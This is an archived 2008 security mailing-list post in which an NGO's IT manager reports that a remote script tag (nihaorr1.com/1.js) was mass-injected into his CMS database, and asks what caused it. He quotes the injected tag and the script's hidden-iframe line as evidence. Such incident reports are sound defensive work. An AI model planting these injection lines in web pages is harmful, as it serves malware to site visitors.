Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Incidents
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Mysterious JavaScript appearance in website database

from [Glenn Gillis] Network Security [Permanent Link]
Subject: Mysterious JavaScript appearance in website database
Date: Mon, 14 Apr 2008 16:03:33 -0700
On Sunday, 2008-April-13 at 01:07:38.030 UTC, the CMS database of the
U.S.-based NGO I work for mysteriously had a JavaScript URL appended to the titles of much of the content on our website:

  <script src=http://www.nihaorr1.com/1.js></script>

NB: the last modified dates for all of the content containing a reference to this script are identical, right down the 1/100 second.

The contents of the script apparently attempts to open an iframe to a
non-existent domain, "nmidahena.com":

  document.writeln("<iframe width=\'10\' height=\'1\'
src=\'http:\/\/www.nmidahena.com\/1.htm\'><\/iframe>");

I haven't found any reports of a new worm, etc. that might account for this, but when I Google "nmidahena.com" I get over 100,000 hits for
other sites on which this script is present.

We are running a custom-developed CMS with MS-SQL Server 2000 as the backend, on Windows NT Server 4.0 SP6a and IIS 4.0 (Yes, I know! The NT Server is fully patched with whatever OS, IIS and SQL Server 2K hotfixes released prior to NT4's end-of-life declaration by MS, for what it's worth.)

Anyone have an idea what might have caused this?
--
Thanks,

Glenn Gillis
ELAW U.S. Information Technology Manager
Environmental Law Alliance Worldwide

[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: SPAM drop?, crazy frog crazy frog
Next by Date:  Re: Mysterious JavaScript appearance in website database, Jon Oberheide
Previous by Thread:  Re: SPAM drop?, Randy Wyatt
Next by Thread:  Re: Mysterious JavaScript appearance in website database, Jon Oberheide
Indexes:  [Date] [Thread] [Top] [All Lists]